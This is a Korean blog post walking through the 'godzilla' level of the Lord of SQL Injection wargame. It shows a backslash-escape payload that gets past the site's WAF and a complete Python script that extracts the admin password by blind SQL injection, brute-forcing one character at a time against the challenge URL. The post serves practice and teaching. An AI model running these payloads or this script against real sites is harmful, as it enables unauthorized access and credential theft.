Web Hacking/LOS

Lord of SQL Injection - godzilla

2021. 10. 3. 18:00

이 친구도 그다지 복잡하지 않은 친구이다. 역슬래시로 id 영역의 싱글쿼터를 벗어나는 방법은 WAF(Web Application Firewall)에 걸리지 않는 것 같다. 

 

Blind SQL Injection 형식의 문제이니 pw를 모두 구해야 한다. 우선 길이부터 구하자.

 

 

id=\&pw= or id="admin" and length(pw)>'0

아주 예쁘게 나온다. 이후에는 pw를 구하는 코드를 짜면 될 것 같다. pw를 구하는 payload 구성 방식에는 다음과 같은 방식들이 있을 것이다.

  1. substr 함수를 사용
  2. pw like "X%" - like문과 와일드카드 이용
  3. pw rlike "^X" - 정규표현식과 rlike 이용
  4. bin(ord(substr())) 함수를 이용 - 2진수로 검색

이번에는 그냥 간단하게 1번으로 payload를 구성하겠다. exploit.py 는 다음과 같다.

 

import requests

requests.packages.urllib3.disable_warnings()
org_url = "https://modsec.rubiya.kr/chall/godzilla_799f2ae774c76c0bfd8429b8d5692918.php"
header  = {'Cookie': 'PHPSESSID='}
session = requests.session()



# Check Length of PW
for i in range(0, 100):
    payload = '?id=\&pw= or id="admin" and length(pw)=' + str(i) + "%23"
    res = session.get(url = org_url + payload, headers=header, verify=False)

    if "Hello admin" in res.text:
        print("Length of PW is [ %d ]\n" % i)
        break

        
# Brute Force
password = ''

for i in range(1, 9):
    for j in range(33, 122):
        payload = '?id=\&pw= or id="admin" and substr(pw,' + str(i) + ',1)=' + "'" + chr(j) 
        res = session.get(url = org_url + payload, headers = header, verify=False)

        if "Hello admin" in res.text:
            password += chr(j)
            print("Current PW is [ %s ]\n" % password)
            break


# Result
print("\n\nPW --> %s\n" % password)

저작자표시 (새창열림)

'Web Hacking > LOS' 카테고리의 다른 글

Lord of SQL Injection - banshee  (0) 2021.10.03
Lord of SQL Injection - manticore  (0) 2021.10.03
Lord of SQL Injection - death  (0) 2021.10.02
Lord of SQL Injection - cthulhu  (1) 2021.10.02
Lord of SQL Injection - ouroborus  (0) 2021.10.02
'Web Hacking/LOS' 카테고리의 다른 글
  • Lord of SQL Injection - banshee
  • Lord of SQL Injection - manticore
  • Lord of SQL Injection - death
  • Lord of SQL Injection - cthulhu
Lucvs
Lucvs
Department of Computer Science and Engineering, 21th, Sungkyunkwan University
Lucvs
Lucvs
Lucvs
전체
오늘
어제
  • 분류 전체보기
    • Lucvs
      • 훈련소 일기
      • 寿司
      • 영국 여행기
    • Pwnable
      • Techniques
      • FTZ
      • LOB
      • HackCTF
      • Dreamhack
      • pwnable.kr
      • CTF
    • Web Hacking
      • Techniques
      • Webhacking.kr
      • HackCTF
      • Dreamhack
      • LOS
    • Reversing
      • Dreamhack
    • Cryptography
      • Modern Cryptography
      • Algorithm
      • Differential Attack (차분 공격)
      • Linear Attack (선형 공격)
    • Forensic
      • Dreamhack
    • Programming
      • C
      • Python
      • Java
    • Deep Learning
    • Network
    • Project
    • Hardware
      • Raspberry Pi
      • Arduino

블로그 메뉴

  • 홈
  • 태그
  • 방명록

공지사항

인기 글

태그

  • 훈련소 일기
  • Lord of SQL Injeciton
  • 일기
  • Web Hacking
  • dreamhack
  • Differential Attack
  • lord of sql injection
  • 공군
  • 기훈단
  • 기본군사훈련단
  • 효전화
  • SQL INJECTION
  • Los
  • 웹해킹
  • 차분 공격
  • 잉글랜드
  • dreamhack.io
  • 영국
  • J
  • 군대
  • blind sql injection
  • 드림핵
  • 공군 훈련소
  • 여행기
  • Error-Based SQL Injection
  • 차분 분석
  • 런던
  • rev-basic
  • 훈련소
  • 군대 일기

최근 댓글

최근 글

hELLO · Designed By 정상우.
Lucvs
Lord of SQL Injection - godzilla
상단으로

티스토리툴바

개인정보

  • 티스토리 홈
  • 포럼
  • 로그인

단축키

내 블로그

내 블로그 - 관리자 홈 전환
Q
Q
새 글 쓰기
W
W

블로그 게시글

글 수정 (권한 있는 경우)
E
E
댓글 영역으로 이동
C
C

모든 영역

이 페이지의 URL 복사
S
S
맨 위로 이동
T
T
티스토리 홈 이동
H
H
단축키 안내
Shift + /
⇧ + /

* 단축키는 한글/영문 대소문자로 이용 가능하며, 티스토리 기본 도메인에서만 동작합니다.